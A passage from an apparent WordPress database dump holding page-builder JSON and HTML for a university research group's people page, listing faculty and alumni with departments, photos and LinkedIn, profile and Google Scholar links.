Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c211\",\"parentId\":\"182-c210\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c210\",\"parentId\":\"182-c209\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c209\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 09:22:06','2023-10-13 13:22:06','',562,'https://gsudice.dataconn.net/?p=1720',0,'revision','',0),(1721,1,'2023-10-13 09:22:06','2023-10-13 13:22:06','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c4-outer\">\n            <div data-colibri-id=\"182-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div 